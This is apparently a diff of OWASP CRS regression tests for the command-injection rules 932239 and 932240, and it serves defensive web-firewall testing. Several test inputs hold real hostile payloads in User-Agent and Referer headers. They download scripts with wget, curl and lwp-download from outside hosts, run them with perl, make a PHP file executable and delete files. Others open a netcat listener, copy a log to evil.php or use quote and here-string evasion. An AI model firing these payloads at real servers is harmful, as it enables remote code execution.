"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=;`cat<<p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: system('echo cd /tmp;wget http://turbatu.altervista.org/apache_32.png -O p2.txt;curl -O http://turbatu.altervista.org/apache_32.png; mv apache_32.png p.txt;lyxn -DUMP http://turbatu.altervista.org/apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932239] + - test_id: 4 desc: System Command Injection (932239) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: http://ricky.ilmerlodellarocca.com/upload.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg; appa.jpg;perl appa.jpg;rm -rf appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;mv ca.php ca.php;chmod 755 ca.php - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: http://ricky.ilmerlodellarocca.com/upload.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg; appa.jpg;perl appa.jpg;rm -rf appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;mv ca.php ca.php;chmod 755 ca.php + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932239] + - test_id: 5 desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: Something true positive „The Title”. After space or new line more characters - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: Something true positive „The Title”. After space or new line more characters + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932239] + - test_id: 6 desc: System Command Injection (932239) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Referer: system('echo cd /tmp;wget http://turbatu.altervista.org/apache_32.png -O p2.txt;curl -O http://turbatu.altervista.org/apache_32.png; mv apache_32.png p.txt;lyxn -DUMP http://turbatu.altervista.org/apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Referer: system('echo cd /tmp;wget http://turbatu.altervista.org/apache_32.png -O p2.txt;curl -O http://turbatu.altervista.org/apache_32.png; mv apache_32.png p.txt;lyxn -DUMP http://turbatu.altervista.org/apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932239] + - test_id: 7 desc: System Command Injection (932239) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Referer: http://ricky.ilmerlodellarocca.com/upload.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg; appa.jpg;perl appa.jpg;rm -rf appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;mv ca.php ca.php;chmod 755 ca.php - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Referer: http://ricky.ilmerlodellarocca.com/upload.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg; appa.jpg;perl appa.jpg;rm -rf appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;mv ca.php ca.php;chmod 755 ca.php + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932239] + - test_id: 8 desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: Something true positive „The Title”. After space or new line more characters - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: Something true positive „The Title”. After space or new line more characters + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932239] + - test_id: 9 desc: "False negative report - user agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: ;cp /var/log/apache2/error.log evil.php - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: id "932239" - - test_title: 932239-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: ;cp /var/log/apache2/error.log evil.php + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log: + expect_ids: [932239] + - test_id: 10 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "python-requests/2.31.0" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "python-requests/2.31.0" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932239] + - test_id: 11 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "Python-urllib/3.9" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "Python-urllib/3.9" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932239] + - test_id: 12 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "Snap URL Preview Service; bot; snapchat; https://developers.snap.com/robots" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "Snap URL Preview Service; bot; snapchat; https://developers.snap.com/robots" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932239] + - test_id: 13 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "w3m/0.5.1" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "w3m/0.5.1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932239] + - test_id: 14 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48)" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48)" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932239] + - test_id: 15 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "wget" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "wget" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932239] + - test_id: 16 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "curl/7.81.0" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "curl/7.81.0" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932239] + - test_id: 17 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "Cpanel-HTTP-Client/1.0" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "Cpanel-HTTP-Client/1.0" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932239] + - test_id: 18 desc: "IXMZUXBG" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: a=nc&&$a -nlvp 555 - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932239" - - test_title: 932239-19 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: a=nc&&$a -nlvp 555 + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [932239] + - test_id: 19 desc: "IXMZUXBG" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Referer: a=nc&&$a -nlvp 555 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932239" - - test_title: 932239-20 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Referer: a=nc&&$a -nlvp 555 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [932239] + - test_id: 20 desc: "FP with word comment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "https://example.com/?args=comment" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932239" - - test_title: 932239-21 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "https://example.com/?args=comment" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932239] + - test_id: 21 desc: "FP with word settings" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "https://example.com/?args=settings" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932239" - - test_title: 932239-22 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "https://example.com/?args=settings" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932239] + - test_id: 22 desc: "FP with word environment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "environment" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932239" - - test_title: 932239-23 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "environment" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932239] + - test_id: 23 desc: "FP with word environment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Referer: "https://example.com/?args=environment" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932239" - - test_title: 932239-24 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Referer: "https://example.com/?args=environment" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932239] + - test_id: 24 desc: "FP with word performance" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "performance" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932239" - - test_title: 932239-25 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "performance" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932239] + - test_id: 25 desc: "FP with word performance" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Referer: "https://example.com/?args=performance" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932239" - - test_title: 932239-26 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Referer: "https://example.com/?args=performance" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932239] + - test_id: 26 desc: "Block execution of env command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "env --version" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-27 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "env --version" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932239] + - test_id: 27 desc: "Block execution of env command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - referer: "https://example.com/?args=env --version" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-28 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + referer: "https://example.com/?args=env --version" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932239] + - test_id: 28 desc: "Block execution of perf command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "perf --version" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-29 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "perf --version" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932239] + - test_id: 29 desc: "Block execution of perf command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - referer: "https://example.com/?args=perf --version" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-30 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + referer: "https://example.com/?args=perf --version" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932239] + - test_id: 30 desc: "Block evasion using here string" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: ";`cat<<()' WAF evasion (mid command) stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=pi>()ng%20127.0.0.1" - version: "HTTP/1.1" - output: - log_contains: id "932240" - - test_title: 932240-16 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=pi>()ng%20127.0.0.1" + version: "HTTP/1.1" + output: + log: + expect_ids: [932240] + - test_id: 16 desc: FP against single quote inside string stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: | - payload=All told, people were taken with the concept of Stadia, but the execution just didn't work. - version: "HTTP/1.1" - output: - no_log_contains: id "932240" - - test_title: 932240-17 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: | + payload=All told, people were taken with the concept of Stadia, but the execution just didn't work. + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932240] + - test_id: 17 desc: "Detect quote evasion: kill '-'9" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: | - payload=kill '-'9 - version: "HTTP/1.1" - output: - log_contains: id "932240" - - test_title: 932240-18 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: | + payload=kill '-'9 + version: "HTTP/1.1" + output: + log: + expect_ids: [932240] + - test_id: 18 desc: "False positive against quote evasion with two quotes" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: | - payload=An affordable housing advocate says the city's rewrite of the land development code would boost affordable housing, but there's room to do more. - version: "HTTP/1.1" - output: - no_log_contains: id "932240" - - test_title: 932240-19 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: 